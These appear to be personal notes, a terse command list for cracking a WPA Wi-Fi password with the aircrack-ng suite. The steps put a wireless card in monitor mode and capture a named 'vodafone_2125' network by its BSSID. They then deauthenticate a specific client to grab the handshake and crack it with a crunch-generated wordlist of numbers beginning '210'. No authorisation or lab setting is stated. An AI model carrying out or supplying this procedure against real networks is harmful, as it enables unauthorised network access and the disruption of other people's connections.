- vbox usb passthrough: add $USER to vboxusers group to allow usb passthrough
- airmon-ng check kill
- systemctl stop
- airmon-ng start
- airodump-ng
- pick out bssid's that have clients (stations) associated with them
- airodump-ng --bssid -c --write
e.g. airodump-ng --bssid 74:9D:79:23:A0:E4 -c 6 --write vodafone_2125 wlp0s20f0u2mon
- aireplay-ng --deauth 100 -a -c <client_mac>
e.g. aireplay-ng --deauth 100 wlp0s20f0u2mon -a 74:9D:79:23:A0:E4 -c 48:4B:AA:86:94:4B - wait for the message "WPA handshake" to appear in the previous step's airdump screen
- aircrack-ng -w
- ./crunch 10 10 -t 210%%%%%%% -o athens.txt